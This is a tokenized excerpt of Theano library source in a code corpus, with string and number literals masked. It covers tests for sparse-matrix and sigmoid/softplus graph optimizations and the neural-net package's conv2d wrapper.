] , <EOL> random . uniform ( idx , nstreams = <NUM_LIT:3> , ndim = <NUM_LIT:1> , <EOL> dtype = '<STR_LIT>' ) , <EOL> mode = mode ) <EOL> fn1_val0 = fn1 ( ) <EOL> fn1_val1 = fn1 ( ) <EOL> assert not numpy . allclose ( fn1_val0 , fn1_val1 ) <EOL> fn2_val0 = fn2 ( ) <EOL> fn2_val1 = fn2 ( ) <EOL> assert not numpy . allclose ( fn2_val0 , fn2_val1 ) <EOL> fn3_val0 = fn3 ( [ <NUM_LIT:4> ] ) <EOL> fn3_val1 = fn3 ( [ <NUM_LIT:4> ] ) <EOL> assert not numpy . allclose ( fn3_val0 , fn3_val1 ) <EOL> assert fn1_val0 . size == <NUM_LIT:4> <EOL> assert fn2_val0 . size == <NUM_LIT:9> <EOL> random . seed ( new_seed ) <EOL> fn1_val2 = fn1 ( ) <EOL> fn1_val3 = fn1 ( ) <EOL> fn2_val2 = fn2 ( ) <EOL> fn2_val3 = fn2 ( ) <EOL> fn3_val2 = fn3 ( [ <NUM_LIT:4> ] ) <EOL> fn3_val3 = fn3 ( [ <NUM_LIT:4> ] ) <EOL> assert numpy . allclose ( fn1_val0 , fn1_val2 ) == same <EOL> assert numpy . allclose ( fn1_val1 , fn1_val3 ) == same <EOL> assert numpy . allclose ( fn2_val0 , fn2_val2 ) == same <EOL> assert numpy . allclose ( fn2_val1 , fn2_val3 ) == same <EOL> assert numpy . allclose ( fn3_val0 , fn3_val2 ) == same <EOL> assert numpy . allclose ( fn3_val1 , fn3_val3 ) == same <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> rng = MRG_RandomStreams ( numpy . random . randint ( <NUM_LIT> ) ) <EOL> print ( theano . __file__ ) <EOL> pvals = theano . tensor . fmatrix ( ) <EOL> for i in range ( <NUM_LIT:10> ) : <EOL> t0 = time . time ( ) <EOL> multinomial = rng . multinomial ( pvals = pvals ) <EOL> print ( time . time ( ) - t0 ) </s>
<s> from nose . plugins . skip import SkipTest <EOL> import numpy <EOL> try : <EOL> import scipy . sparse as sp <EOL> import scipy . sparse <EOL> except ImportError : <EOL> pass <EOL> import theano <EOL> from theano import sparse , config , tensor <EOL> from theano . sparse import enable_sparse <EOL> if not enable_sparse : <EOL> raise SkipTest ( '<STR_LIT>' ) <EOL> from theano . sparse . tests . test_basic import random_lil <EOL> def test_local_csm_properties_csm ( ) : <EOL> data = tensor . vector ( ) <EOL> indices , indptr , shape = ( tensor . ivector ( ) , tensor . ivector ( ) , <EOL> tensor . ivector ( ) ) <EOL> mode = theano . compile . mode . get_default_mode ( ) <EOL> mode = mode . including ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> for CS , cast in [ ( sparse . CSC , sp . csc_matrix ) , <EOL> ( sparse . CSR , sp . csr_matrix ) ] : <EOL> f = theano . function ( [ data , indices , indptr , shape ] , <EOL> sparse . csm_properties ( <EOL> CS ( data , indices , indptr , shape ) ) , <EOL> mode = mode ) <EOL> assert not any ( <EOL> isinstance ( node . op , ( sparse . CSM , sparse . CSMProperties ) ) <EOL> for node in f . maker . fgraph . toposort ( ) ) <EOL> v = cast ( random_lil ( ( <NUM_LIT:10> , <NUM_LIT> ) , <EOL> config . floatX , <NUM_LIT:3> ) ) <EOL> f ( v . data , v . indices , v . indptr , v . shape ) <EOL> def test_local_csm_grad_c ( ) : <EOL> raise SkipTest ( "<STR_LIT>" ) <EOL> if not theano . config . cxx : <EOL> raise SkipTest ( "<STR_LIT>" ) <EOL> data = tensor . vector ( ) <EOL> indices , indptr , shape = ( tensor . ivector ( ) , tensor . ivector ( ) , <EOL> tensor . ivector ( ) ) <EOL> mode = theano . compile . mode . get_default_mode ( ) <EOL> if theano . config . mode == '<STR_LIT>' : <EOL> mode = theano . compile . Mode ( linker = '<STR_LIT>' , optimizer = '<STR_LIT>' ) <EOL> mode = mode . including ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> for CS , cast in [ ( sparse . CSC , sp . csc_matrix ) , ( sparse . CSR , sp . csr_matrix ) ] : <EOL> cost = tensor . sum ( sparse . DenseFromSparse ( ) ( CS ( data , indices , indptr , shape ) ) ) <EOL> f = theano . function ( <EOL> [ data , indices , indptr , shape ] , <EOL> tensor . grad ( cost , data ) , <EOL> mode = mode ) <EOL> assert not any ( isinstance ( node . op , sparse . CSMGrad ) for node <EOL> in f . maker . fgraph . toposort ( ) ) <EOL> v = cast ( random_lil ( ( <NUM_LIT:10> , <NUM_LIT> ) , <EOL> config . floatX , <NUM_LIT:3> ) ) <EOL> f ( v . data , v . indices , v . indptr , v . shape ) <EOL> def test_local_mul_s_d ( ) : <EOL> if not theano . config . cxx : <EOL> raise SkipTest ( "<STR_LIT>" ) <EOL> mode = theano . compile . mode . get_default_mode ( ) <EOL> mode = mode . including ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> for sp_format in sparse . sparse_formats : <EOL> inputs = [ getattr ( theano . sparse , sp_format + '<STR_LIT>' ) ( ) , <EOL> tensor . matrix ( ) ] <EOL> f = theano . function ( inputs , <EOL> sparse . mul_s_d ( * inputs ) , <EOL> mode = mode ) <EOL> assert not any ( isinstance ( node . op , sparse . MulSD ) for node <EOL> in f . maker . fgraph . toposort ( ) ) <EOL> def test_local_mul_s_v ( ) : <EOL> if not theano . config . cxx : <EOL> raise SkipTest ( "<STR_LIT>" ) <EOL> mode = theano . compile . mode . get_default_mode ( ) <EOL> mode = mode . including ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> for sp_format in [ '<STR_LIT>' ] : <EOL> inputs = [ getattr ( theano . sparse , sp_format + '<STR_LIT>' ) ( ) , <EOL> tensor . vector ( ) ] <EOL> f = theano . function ( inputs , <EOL> sparse . mul_s_v ( * inputs ) , <EOL> mode = mode ) <EOL> assert not any ( isinstance ( node . op , sparse . MulSV ) for node <EOL> in f . maker . fgraph . toposort ( ) ) <EOL> def test_local_structured_add_s_v ( ) : <EOL> if not theano . config . cxx : <EOL> raise SkipTest ( "<STR_LIT>" ) <EOL> mode = theano . compile . mode . get_default_mode ( ) <EOL> mode = mode . including ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> for sp_format in [ '<STR_LIT>' ] : <EOL> inputs = [ getattr ( theano . sparse , sp_format + '<STR_LIT>' ) ( ) , <EOL> tensor . vector ( ) ] <EOL> f = theano . function ( inputs , <EOL> sparse . structured_add_s_v ( * inputs ) , <EOL> mode = mode ) <EOL> assert not any ( isinstance ( node . op , sparse . StructuredAddSV ) for node <EOL> in f . maker . fgraph . toposort ( ) ) <EOL> def test_local_sampling_dot_csr ( ) : <EOL> if not theano . config . cxx : <EOL> raise SkipTest ( "<STR_LIT>" ) <EOL> mode = theano . compile . mode . get_default_mode ( ) <EOL> mode = mode . including ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> for sp_format in [ '<STR_LIT>' ] : <EOL> inputs = [ tensor . matrix ( ) , <EOL> tensor . matrix ( ) , <EOL> getattr ( theano . sparse , sp_format + '<STR_LIT>' ) ( ) ] <EOL> f = theano . function ( inputs , <EOL> sparse . sampling_dot ( * inputs ) , <EOL> mode = mode ) <EOL> if theano . config . blas . ldflags : <EOL> assert not any ( isinstance ( node . op , sparse . SamplingDot ) for node <EOL> in f . maker . fgraph . toposort ( ) ) <EOL> else : <EOL> assert not any ( isinstance ( node . op , sparse . opt . SamplingDotCSR ) for node <EOL> in f . maker . fgraph . toposort ( ) ) <EOL> def test_local_dense_from_sparse_sparse_from_dense ( ) : <EOL> mode = theano . compile . mode . get_default_mode ( ) <EOL> mode = mode . including ( "<STR_LIT>" ) <EOL> m = theano . tensor . matrix ( ) <EOL> for op in [ theano . sparse . csr_from_dense , theano . sparse . csc_from_dense ] : <EOL> s = op ( m ) <EOL> o = theano . sparse . dense_from_sparse ( s ) <EOL> f = theano . function ( [ m ] , o , mode = mode ) <EOL> assert len ( f . maker . fgraph . apply_nodes ) == <NUM_LIT:1> <EOL> f ( [ [ <NUM_LIT:1> , <NUM_LIT:2> ] , [ <NUM_LIT:3> , <NUM_LIT:4> ] ] ) <EOL> def test_sd_csc ( ) : <EOL> A = sp . rand ( <NUM_LIT:4> , <NUM_LIT:5> , density = <NUM_LIT> , format = '<STR_LIT>' , dtype = numpy . float32 ) <EOL> b = numpy . random . rand ( <NUM_LIT:5> , <NUM_LIT:2> ) . astype ( numpy . float32 ) <EOL> target = A * b <EOL> a_val = theano . tensor . as_tensor_variable ( A . data ) <EOL> a_ind = theano . tensor . as_tensor_variable ( A . indices ) <EOL> a_ptr = theano . tensor . as_tensor_variable ( A . indptr ) <EOL> nrows = theano . tensor . as_tensor_variable ( numpy . int32 ( A . shape [ <NUM_LIT:0> ] ) ) <EOL> b = theano . tensor . as_tensor_variable ( b ) <EOL> res = theano . sparse . opt . sd_csc ( a_val , a_ind , a_ptr , nrows , b ) . eval ( ) <EOL> assert ( res == target ) . all ( ) </s>
<s> from . nnet import ( <EOL> CrossentropyCategorical1Hot , CrossentropyCategorical1HotGrad , <EOL> CrossentropySoftmax1HotWithBiasDx , CrossentropySoftmaxArgmax1HotWithBias , <EOL> LogSoftmax , Prepend_scalar_constant_to_each_row , <EOL> Prepend_scalar_to_each_row , Softmax , <EOL> SoftmaxGrad , SoftmaxWithBias , binary_crossentropy , <EOL> categorical_crossentropy , crossentropy_categorical_1hot , <EOL> crossentropy_categorical_1hot_grad , crossentropy_softmax_1hot , <EOL> crossentropy_softmax_1hot_with_bias , <EOL> crossentropy_softmax_1hot_with_bias_dx , <EOL> crossentropy_softmax_argmax_1hot_with_bias , <EOL> crossentropy_softmax_max_and_argmax_1hot , <EOL> crossentropy_softmax_max_and_argmax_1hot_with_bias , <EOL> crossentropy_to_crossentropy_with_softmax , <EOL> crossentropy_to_crossentropy_with_softmax_with_bias , <EOL> graph_merge_softmax_with_crossentropy_softmax , h_softmax , <EOL> logsoftmax , logsoftmax_op , prepend_0_to_each_row , prepend_1_to_each_row , <EOL> prepend_scalar_to_each_row , relu , softmax , softmax_grad , softmax_graph , <EOL> softmax_op , softmax_simplifier , softmax_with_bias , elu ) <EOL> from . import opt <EOL> from . conv import ConvOp <EOL> from . Conv3D import * <EOL> from . ConvGrad3D import * <EOL> from . ConvTransp3D import * <EOL> from . sigm import ( softplus , sigmoid , sigmoid_inplace , <EOL> scalar_sigmoid , ultra_fast_sigmoid , <EOL> hard_sigmoid ) <EOL> from . bn import batch_normalization <EOL> import warnings <EOL> from . abstract_conv import conv2d as abstract_conv2d <EOL> def conv2d ( input , filters , input_shape = None , filter_shape = None , <EOL> border_mode = '<STR_LIT>' , subsample = ( <NUM_LIT:1> , <NUM_LIT:1> ) , filter_flip = True , <EOL> image_shape = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' in kwargs or '<STR_LIT>' in kwargs : <EOL> raise ValueError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if len ( kwargs . keys ( ) ) > <NUM_LIT:0> : <EOL> warnings . warn ( str ( kwargs . keys ( ) ) + <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> stacklevel = <NUM_LIT:2> ) <EOL> if image_shape is not None : <EOL> warnings . warn ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> stacklevel = <NUM_LIT:2> ) <EOL> if input_shape is None : <EOL> input_shape = image_shape <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return abstract_conv2d ( input , filters , input_shape , filter_shape , <EOL> border_mode , subsample , filter_flip ) </s>
<s> from __future__ import print_function <EOL> import unittest <EOL> import numpy <EOL> from theano . compat import imap <EOL> import theano . tensor . inplace <EOL> from theano . tensor import basic as tensor <EOL> from theano import tensor as T <EOL> from theano import config <EOL> from theano . tests import unittest_tools as utt <EOL> from theano . tensor . nnet import ( sigmoid , sigmoid_inplace , <EOL> softplus , ultra_fast_sigmoid , hard_sigmoid ) <EOL> from theano . tensor . nnet . sigm import ( <EOL> compute_mul , is_1pexp , parse_mul_tree , perform_sigm_times_exp , <EOL> register_local_1msigmoid , simplify_mul , <EOL> ) <EOL> from theano . tensor . tests . test_basic import ( makeBroadcastTester , rand , <EOL> check_floatX , upcast_int8_nfunc , <EOL> _good_broadcast_unary_normal_no_complex ) <EOL> class T_sigmoid ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> utt . seed_rng ( ) <EOL> def test_elemwise ( self ) : <EOL> utt . verify_grad ( sigmoid , [ numpy . random . rand ( <NUM_LIT:3> , <NUM_LIT:4> ) ] ) <EOL> SigmoidTester = makeBroadcastTester ( <EOL> op = sigmoid , <EOL> expected = upcast_int8_nfunc ( lambda inputs : check_floatX ( <EOL> inputs , <NUM_LIT:1> / ( <NUM_LIT:1> + numpy . exp ( - inputs ) ) ) ) , <EOL> good = _good_broadcast_unary_normal_no_complex , <EOL> name = '<STR_LIT>' , <EOL> ) <EOL> UltraFastSigmoidTester = makeBroadcastTester ( <EOL> op = ultra_fast_sigmoid , <EOL> expected = upcast_int8_nfunc ( lambda inputs : check_floatX ( <EOL> inputs , <NUM_LIT:1> / ( <NUM_LIT:1> + numpy . exp ( - inputs ) ) ) ) , <EOL> good = _good_broadcast_unary_normal_no_complex , <EOL> name = '<STR_LIT>' , <EOL> eps = <NUM_LIT> ) <EOL> HardSigmoidTester = makeBroadcastTester ( <EOL> op = hard_sigmoid , <EOL> expected = upcast_int8_nfunc ( lambda inputs : check_floatX ( <EOL> inputs , <NUM_LIT:1> / ( <NUM_LIT:1> + numpy . exp ( - inputs ) ) ) ) , <EOL> good = _good_broadcast_unary_normal_no_complex , <EOL> name = '<STR_LIT>' , <EOL> eps = <NUM_LIT> ) <EOL> SoftplusTester = makeBroadcastTester ( <EOL> op = softplus , <EOL> expected = upcast_int8_nfunc ( lambda inputs : check_floatX ( <EOL> inputs , numpy . log1p ( numpy . exp ( inputs ) ) ) ) , <EOL> good = dict ( _good_broadcast_unary_normal_no_complex , <EOL> int8 = [ numpy . arange ( - <NUM_LIT> , <NUM_LIT> , dtype = '<STR_LIT>' ) ] ) , <EOL> name = '<STR_LIT>' , <EOL> ) <EOL> class T_softplus ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> utt . seed_rng ( ) <EOL> def test_elemwise ( self ) : <EOL> utt . verify_grad ( softplus , [ numpy . random . rand ( <NUM_LIT:3> , <NUM_LIT:4> ) ] ) <EOL> class T_sigmoid_opts ( unittest . TestCase ) : <EOL> def get_mode ( self , excluding = None ) : <EOL> """<STR_LIT>""" <EOL> if excluding is None : <EOL> excluding = [ ] <EOL> m = theano . config . mode <EOL> if m == '<STR_LIT>' : <EOL> mode = theano . compile . mode . get_mode ( '<STR_LIT>' ) <EOL> else : <EOL> mode = theano . compile . mode . get_default_mode ( ) <EOL> if excluding : <EOL> return mode . excluding ( * excluding ) <EOL> else : <EOL> return mode <EOL> def test_exp_over_1_plus_exp ( self ) : <EOL> m = self . get_mode ( excluding = [ '<STR_LIT>' ] ) <EOL> x = T . vector ( ) <EOL> data = numpy . random . rand ( <NUM_LIT> ) . astype ( config . floatX ) <EOL> backup = config . warn . identify_1pexp_bug <EOL> config . warn . identify_1pexp_bug = False <EOL> try : <EOL> f = theano . function ( [ x ] , T . exp ( x ) / ( <NUM_LIT:1> + T . exp ( x ) ) , mode = m ) <EOL> assert [ node . op for node in f . maker . fgraph . toposort ( ) ] == [ sigmoid ] <EOL> f ( data ) <EOL> f = theano . function ( [ x ] , T . exp ( x ) / ( <NUM_LIT:2> + T . exp ( x ) ) , mode = m ) <EOL> assert [ node . op for node in f . maker . fgraph . toposort ( ) ] != [ sigmoid ] <EOL> f ( data ) <EOL> f = theano . function ( [ x ] , T . exp ( x ) / ( <NUM_LIT:1> - T . exp ( x ) ) , mode = m ) <EOL> assert [ node . op for node in f . maker . fgraph . toposort ( ) ] != [ sigmoid ] <EOL> f ( data ) <EOL> f = theano . function ( [ x ] , T . exp ( x + <NUM_LIT:1> ) / ( <NUM_LIT:1> + T . exp ( x ) ) , mode = m ) <EOL> assert [ node . op for node in f . maker . fgraph . toposort ( ) ] != [ sigmoid ] <EOL> f ( data ) <EOL> f = theano . function ( [ x ] , T . fill ( x , <NUM_LIT:1.0> ) / ( <NUM_LIT:1> + T . exp ( - x ) ) , mode = m ) <EOL> assert [ node . op for node in f . maker . fgraph . toposort ( ) ] == [ sigmoid ] <EOL> f ( data ) <EOL> f = theano . function ( [ x ] , T . fill ( x , <NUM_LIT:1.0> ) / ( <NUM_LIT:2> + T . exp ( - x ) ) , mode = m ) <EOL> assert [ node . op for node in f . maker . fgraph . toposort ( ) ] != [ sigmoid ] <EOL> f ( data ) <EOL> f = theano . function ( [ x ] , T . fill ( x , <NUM_LIT:1.0> ) / ( <NUM_LIT:1> - T . exp ( - x ) ) , mode = m ) <EOL> assert [ node . op for node in f . maker . fgraph . toposort ( ) ] != [ sigmoid ] <EOL> f ( data ) <EOL> f = theano . function ( [ x ] , T . fill ( x , <NUM_LIT> ) / ( <NUM_LIT:1> + T . exp ( - x ) ) , mode = m ) <EOL> assert [ node . op for node in f . maker . fgraph . toposort ( ) ] != [ sigmoid ] <EOL> f ( data ) <EOL> f = theano . function ( [ x ] , T . fill ( x , - <NUM_LIT:1.0> ) / ( <NUM_LIT:1> + T . exp ( - x ) ) , mode = m ) <EOL> assert [ node . op for node in f . maker . fgraph . toposort ( ) ] == [ sigmoid , <EOL> theano . tensor . inplace . neg_inplace ] <EOL> f ( data ) <EOL> f = theano . function ( [ x ] , T . fill ( x , - <NUM_LIT:1.0> ) / ( <NUM_LIT:1> - T . exp ( - x ) ) , mode = m ) <EOL> assert [ node . op for node in f . maker . fgraph . toposort ( ) ] != [ sigmoid , <EOL> theano . tensor . inplace . neg_inplace ] <EOL> f ( data ) <EOL> f = theano . function ( [ x ] , T . fill ( x , - <NUM_LIT:1.0> ) / ( <NUM_LIT:2> + T . exp ( - x ) ) , mode = m ) <EOL> assert [ node . op for node in f . maker . fgraph . toposort ( ) ] != [ sigmoid , <EOL> theano . tensor . inplace . neg_inplace ] <EOL> f ( data ) <EOL> f = theano . function ( [ x ] , T . fill ( x , - <NUM_LIT> ) / ( <NUM_LIT:1> + T . exp ( - x ) ) , mode = m ) <EOL> assert [ node . op for node in f . maker . fgraph . toposort ( ) ] != [ sigmoid , <EOL> theano . tensor . inplace . neg_inplace ] <EOL> f ( data ) <EOL> f = theano . function ( [ x ] , ( T . fill ( x , - <NUM_LIT:1.0> ) * T . exp ( x ) ) / <EOL> ( ( <NUM_LIT:1> + T . exp ( x ) ) * ( <NUM_LIT:1> + T . exp ( - x ) ) ) , mode = m ) <EOL> assert [ node . op for node in f . maker . fgraph . toposort ( ) ] == [ sigmoid , <EOL> T . mul ] <EOL> f ( data ) <EOL> f = theano . function ( [ x ] , ( T . fill ( x , - <NUM_LIT> ) * T . exp ( x ) ) / <EOL> ( ( <NUM_LIT:1> + T . exp ( x ) ) * ( <NUM_LIT:1> + T . exp ( - x ) ) ) , mode = m ) <EOL> assert [ node . op for node in f . maker . fgraph . toposort ( ) ] != [ sigmoid , <EOL> T . mul , theano . tensor . inplace . neg_inplace ] <EOL> f ( data ) <EOL> f = theano . function ( [ x ] , ( T . fill ( x , - <NUM_LIT:1.0> ) * T . exp ( x ) ) / <EOL> ( ( <NUM_LIT:2> + T . exp ( x ) ) * ( <NUM_LIT:1> + T . exp ( - x ) ) ) , mode = m ) <EOL> assert [ node . op for node in f . maker . fgraph . toposort ( ) ] != [ sigmoid , <EOL> T . mul , theano . tensor . inplace . neg_inplace ] <EOL> f ( data ) <EOL> f = theano . function ( [ x ] , ( T . fill ( x , - <NUM_LIT:1.0> ) * T . exp ( x ) ) / <EOL> ( ( <NUM_LIT:1> + T . exp ( x ) ) * ( <NUM_LIT:2> + T . exp ( - x ) ) ) , mode = m ) <EOL> assert [ node . op for node in f . maker . fgraph . toposort ( ) ] != [ sigmoid , <EOL> T . mul , theano . tensor . inplace . neg_inplace ] <EOL> f ( data ) <EOL> f = theano . function ( [ x ] , ( T . fill ( x , - <NUM_LIT:1.0> ) * T . exp ( x ) ) / <EOL> ( ( <NUM_LIT:1> + T . exp ( x ) ) * ( <NUM_LIT:1> + T . exp ( x ) ) ) , mode = m ) <EOL> assert [ node . op for node in f . maker . fgraph . toposort ( ) ] != [ sigmoid , <EOL> T . mul , theano . tensor . inplace . neg_inplace ] <EOL> f ( data ) <EOL> f = theano . function ( [ x ] , ( T . fill ( x , - <NUM_LIT:1.0> ) * T . exp ( x ) ) / <EOL> ( ( <NUM_LIT:1> + T . exp ( x ) ) * ( <NUM_LIT:2> + T . exp ( - x ) ) ) , mode = m ) <EOL> assert [ node . op for node in f . maker . fgraph . toposort ( ) ] != [ sigmoid , <EOL> T . mul , theano . tensor . inplace . neg_inplace ] <EOL> f ( data ) <EOL> finally : <EOL> config . warn . identify_1pexp_bug = backup <EOL> def test_1msigmoid ( self ) : <EOL> if not register_local_1msigmoid : <EOL> return <EOL> m = self . get_mode ( ) <EOL> x = T . fmatrix ( ) <EOL> f = theano . function ( [ x ] , <NUM_LIT:1> - T . exp ( x ) / ( <NUM_LIT:1> + T . exp ( x ) ) , mode = m ) <EOL> assert [ node . op for node in f . maker . fgraph . toposort ( ) ] == [ <EOL> tensor . neg , sigmoid_inplace ] <EOL> f = theano . function ( [ x ] , <NUM_LIT:1> - T . fill ( x , <NUM_LIT:1.0> ) / ( <NUM_LIT:1> + T . exp ( - x ) ) , mode = m ) <EOL> assert [ node . op for node in f . maker . fgraph . toposort ( ) ] == [ tensor . neg , <EOL> sigmoid_inplace ] <EOL> def test_local_sigm_times_exp ( self ) : <EOL> """<STR_LIT>""" <EOL> def match ( func , ops ) : <EOL> assert [ node . op for node in func . maker . fgraph . toposort ( ) ] == ops <EOL> m = self . get_mode ( excluding = [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> x , y = tensor . vectors ( '<STR_LIT:x>' , '<STR_LIT:y>' ) <EOL> f = theano . function ( [ x ] , sigmoid ( - x ) * tensor . exp ( x ) , mode = m ) <EOL> match ( f , [ sigmoid ] ) <EOL> f = theano . function ( [ x ] , sigmoid ( x ) * tensor . exp ( - x ) , mode = m ) <EOL> match ( f , [ tensor . neg , sigmoid ] ) <EOL> f = theano . function ( [ x ] , - ( - ( - ( sigmoid ( x ) ) ) ) * tensor . exp ( - x ) , mode = m ) <EOL> match ( f , [ tensor . neg , sigmoid , tensor . neg ] ) <EOL> f = theano . function ( <EOL> [ x , y ] , <EOL> ( sigmoid ( x ) * sigmoid ( - y ) * - tensor . exp ( - x ) * <EOL> tensor . exp ( x * y ) * tensor . exp ( y ) ) , <EOL> mode = m ) <EOL> match ( f , [ sigmoid , tensor . mul , tensor . neg , tensor . exp , sigmoid , <EOL> tensor . mul ] ) <EOL> def test_perform_sigm_times_exp ( self ) : <EOL> """<STR_LIT>""" <EOL> x , y , z , t = tensor . vectors ( '<STR_LIT:x>' , '<STR_LIT:y>' , '<STR_LIT:z>' , '<STR_LIT:t>' ) <EOL> exp = tensor . exp <EOL> def ok ( expr1 , expr2 ) : <EOL> trees = [ parse_mul_tree ( e ) for e in ( expr1 , expr2 ) ] <EOL> perform_sigm_times_exp ( trees [ <NUM_LIT:0> ] ) <EOL> trees [ <NUM_LIT:0> ] = simplify_mul ( trees [ <NUM_LIT:0> ] ) <EOL> good = theano . gof . graph . is_same_graph ( <EOL> compute_mul ( trees [ <NUM_LIT:0> ] ) , <EOL> compute_mul ( trees [ <NUM_LIT:1> ] ) ) <EOL> if not good : <EOL> print ( trees [ <NUM_LIT:0> ] ) <EOL> print ( trees [ <NUM_LIT:1> ] ) <EOL> print ( '<STR_LIT>' ) <EOL> theano . printing . debugprint ( compute_mul ( trees [ <NUM_LIT:0> ] ) ) <EOL> print ( '<STR_LIT>' ) <EOL> theano . printing . debugprint ( compute_mul ( trees [ <NUM_LIT:1> ] ) ) <EOL> assert good <EOL> ok ( sigmoid ( x ) * exp ( - x ) , sigmoid ( - x ) ) <EOL> ok ( - x * sigmoid ( x ) * ( y * ( - <NUM_LIT:1> * z ) * exp ( - x ) ) , <EOL> - x * sigmoid ( - x ) * ( y * ( - <NUM_LIT:1> * z ) ) ) <EOL> ok ( - sigmoid ( - x ) * <EOL> ( exp ( y ) * ( - exp ( - z ) * <NUM_LIT:3> * - exp ( x ) ) * <EOL> ( y * <NUM_LIT:2> * ( - sigmoid ( - y ) * ( z + t ) * exp ( z ) ) * sigmoid ( z ) ) ) * <EOL> - sigmoid ( x ) , <EOL> sigmoid ( x ) * <EOL> ( - sigmoid ( y ) * ( - sigmoid ( - z ) * <NUM_LIT:3> ) * ( y * <NUM_LIT:2> * ( ( z + t ) * exp ( z ) ) ) ) * <EOL> - sigmoid ( x ) ) <EOL> ok ( exp ( - x ) * - exp ( - x ) * ( - sigmoid ( x ) * - sigmoid ( x ) ) , <EOL> - sigmoid ( - x ) * sigmoid ( - x ) ) <EOL> ok ( - exp ( x ) * - sigmoid ( - x ) * - exp ( - x ) , <EOL> - sigmoid ( - x ) ) <EOL> def test_grad_log1msigm ( self ) : <EOL> x = tensor . matrix ( '<STR_LIT:x>' ) <EOL> lr = tensor . scalar ( '<STR_LIT>' ) <EOL> s = sigmoid ( x ) <EOL> l = T . log ( <NUM_LIT:1> - s ) <EOL> c = l . mean ( ) <EOL> ux = x - lr * theano . grad ( c , x ) <EOL> mode = self . get_mode ( ) <EOL> if not isinstance ( mode , theano . compile . DebugMode ) : <EOL> f = theano . function ( [ x , lr ] , ux , mode = mode ) <EOL> ux_v = f ( [ [ <NUM_LIT:50> ] ] , <NUM_LIT:0.1> ) <EOL> assert not numpy . isnan ( ux_v ) <EOL> def test_local_ultra_fast_sigmoid ( self ) : <EOL> x = tensor . matrix ( '<STR_LIT:x>' ) <EOL> s = sigmoid ( x ) <EOL> mode = self . get_mode ( '<STR_LIT>' ) <EOL> f = theano . function ( [ x ] , s , mode = mode ) <EOL> topo = f . maker . fgraph . toposort ( ) <EOL> assert len ( topo ) == <NUM_LIT:1> <EOL> assert topo [ <NUM_LIT:0> ] . op == sigmoid <EOL> mode = self . get_mode ( ) . including ( '<STR_LIT>' ) <EOL> f = theano . function ( [ x ] , s , mode = mode ) <EOL> topo = f . maker . fgraph . toposort ( ) <EOL> assert topo [ <NUM_LIT:0> ] . op == ultra_fast_sigmoid <EOL> assert len ( topo ) == <NUM_LIT:1> <EOL> ux_v = f ( [ [ - <NUM_LIT:50> , - <NUM_LIT:10> , - <NUM_LIT:4> , - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:4> , <NUM_LIT:10> , <NUM_LIT:50> ] ] ) <EOL> def test_local_hard_sigmoid ( self ) : <EOL> x = tensor . matrix ( '<STR_LIT:x>' ) <EOL> s = sigmoid ( x ) <EOL> mode = self . get_mode ( '<STR_LIT>' ) <EOL> f = theano . function ( [ x ] , s , mode = mode ) <EOL> topo = f . maker . fgraph . toposort ( ) <EOL> assert topo [ <NUM_LIT:0> ] . op == sigmoid <EOL> assert len ( topo ) == <NUM_LIT:1> <EOL> mode = self . get_mode ( ) . including ( '<STR_LIT>' ) <EOL> f = theano . function ( [ x ] , s , mode = mode ) <EOL> topo = f . maker . fgraph . toposort ( ) <EOL> assert len ( topo ) > <NUM_LIT:1> <EOL> assert not any ( [ n . op == sigmoid for n in topo ] ) <EOL> ux_v = f ( [ [ - <NUM_LIT:50> , - <NUM_LIT:10> , - <NUM_LIT:4> , - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:4> , <NUM_LIT:10> , <NUM_LIT:50> ] ] ) <EOL> class T_softplus_opts ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> if theano . config . mode == '<STR_LIT>' : <EOL> m = theano . compile . mode . get_mode ( '<STR_LIT>' ) . excluding ( <EOL> '<STR_LIT>' ) <EOL> else : <EOL> m = theano . compile . mode . get_default_mode ( ) . excluding ( <EOL> '<STR_LIT>' ) <EOL> self . m = m <EOL> utt . seed_rng ( ) <EOL> def test_logsigm_to_softplus ( self ) : <EOL> x = T . vector ( ) <EOL> out = T . log ( sigmoid ( x ) ) <EOL> f = theano . function ( [ x ] , out , mode = self . m ) <EOL> topo = f . maker . fgraph . toposort ( ) <EOL> assert len ( topo ) == <NUM_LIT:3> <EOL> assert isinstance ( topo [ <NUM_LIT:0> ] . op . scalar_op , theano . scalar . Neg ) <EOL> assert isinstance ( topo [ <NUM_LIT:1> ] . op . scalar_op , <EOL> theano . tensor . nnet . sigm . ScalarSoftplus ) <EOL> assert isinstance ( topo [ <NUM_LIT:2> ] . op . scalar_op , theano . scalar . Neg ) <EOL> f ( numpy . random . rand ( <NUM_LIT> ) . astype ( config . floatX ) ) <EOL> def test_log1msigm_to_softplus ( self ) : <EOL> x = T . matrix ( ) <EOL> out = T . log ( <NUM_LIT:1> - sigmoid ( x ) ) <EOL> f = theano . function ( [ x ] , out , mode = self . m ) <EOL> topo = f . maker . fgraph . toposort ( ) <EOL> assert len ( topo ) == <NUM_LIT:2> <EOL> assert isinstance ( topo [ <NUM_LIT:0> ] . op . scalar_op , <EOL> theano . tensor . nnet . sigm . ScalarSoftplus ) <EOL> assert isinstance ( topo [ <NUM_LIT:1> ] . op . scalar_op , theano . scalar . Neg ) <EOL> f ( numpy . random . rand ( <NUM_LIT> , <NUM_LIT:11> ) . astype ( config . floatX ) ) <EOL> out = T . log ( <NUM_LIT:1> - T . flatten ( sigmoid ( x ) ) ) <EOL> f = theano . function ( [ x ] , out , mode = self . m ) <EOL> topo = f . maker . fgraph . 